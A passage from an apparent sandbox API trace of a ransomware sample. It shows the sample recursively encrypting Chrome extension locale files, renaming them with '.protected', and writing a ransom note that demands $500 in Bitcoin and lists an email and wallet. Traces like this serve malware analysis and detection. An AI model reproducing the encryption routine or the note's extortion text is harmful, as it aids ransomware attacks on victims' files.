pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\*") returned 143 [0080.007] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.007] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.007] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.007] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.007] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.007] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.007] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\.") returned 143 [0080.007] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.007] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.007] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.007] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.007] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.007] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.007] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.007] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\..") returned 144 [0080.007] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.007] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.007] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.007] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.007] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.007] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.007] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.007] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.007] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json") returned 155 [0080.007] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.007] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.008] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.008] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.008] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json") returned 155 [0080.008] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.008] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json") returned 155 [0080.008] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.008] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json") returned 155 [0080.008] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.008] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.009] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.009] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.009] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.009] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.009] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.010] CloseHandle (hObject=0x168) returned 1 [0080.010] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.protected") returned 165 [0080.010] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.protected")) returned 1 [0080.010] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.010] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.010] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\RESTORE_FILES.txt") returned 159 [0080.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.011] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.011] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.011] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.011] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.011] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.011] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.011] CloseHandle (hObject=0x164) returned 1 [0080.011] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.012] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0080.012] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0080.012] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0080.012] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0080.012] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0080.012] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs") returned 141 [0080.012] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0080.012] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0080.012] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\*") returned 143 [0080.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.012] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.012] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.012] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.012] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.012] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.012] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\.") returned 143 [0080.012] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.012] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.012] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.012] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.012] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.012] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.012] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.012] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\..") returned 144 [0080.012] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.012] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.012] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.012] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.012] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.012] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.012] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.012] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.012] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json") returned 155 [0080.012] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.012] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.013] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.013] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.013] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json") returned 155 [0080.013] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.013] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json") returned 155 [0080.013] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.013] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json") returned 155 [0080.013] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.013] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0080.014] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.014] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xda, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xda, lpOverlapped=0x0) returned 1 [0080.014] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.014] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.014] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.014] CloseHandle (hObject=0x168) returned 1 [0080.014] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.protected") returned 165 [0080.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.protected")) returned 1 [0080.015] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.015] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.015] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\RESTORE_FILES.txt") returned 159 [0080.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.015] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.015] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.016] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.016] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.016] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.016] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.016] CloseHandle (hObject=0x164) returned 1 [0080.016] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.016] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0080.016] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0080.016] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0080.016] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0080.016] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0080.016] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da") returned 141 [0080.016] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0080.016] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0080.016] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\*") returned 143 [0080.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.016] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.016] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.016] lstrcmpiW (lpString1=".", 